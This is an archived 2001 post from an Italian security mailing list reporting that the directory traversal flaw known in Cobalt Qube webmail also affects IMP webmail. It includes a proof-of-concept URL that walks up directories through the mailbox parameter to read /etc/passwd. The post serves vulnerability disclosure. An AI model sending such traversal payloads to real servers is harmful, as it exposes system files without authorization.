cobalt cube... & more

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Luglio 2001 ml@sikurezza.org
Soggetto: cobalt cube... & more
Mittente: Marinelli Alessio
Data: 6 Jul 2001 15:45:15 -0000

Avrete sicuramente letto l'exploit del webmail dei Cobalt Qube per leggere
files di sistema, beh la stessa cosa e' riproducibile con IMP (ho provato
anche con l'ultima snapshot)

fortunatamente i file ownati dagli utenti o da root non possono essere
letti.... a meno che non abbiate l'httpd che gira come root ;)


salumi & bachi

ah dimenticavo, se volete provare, 

http://YourCoolIMPserver/mailbox.php3?mailbox=../../../../../../../../../../
../../../../../../../../../etc/passwd


-
Alessio Marinelli
Managed Services and Platforms - Managed Custom Services
Saritel S.p.A.
SS 148 Pontina, Km 29.100 - 00040 Pomezia (Roma)



________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Data:
- precedente: RE: restrizioni internet explorer, Francesco Beccari
- successivo: NAT, walter valenti
- indice

Argomento:
- precedente: Re: restrizioni internet explorer, Master Shadow
- successivo: NAT, walter valenti
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005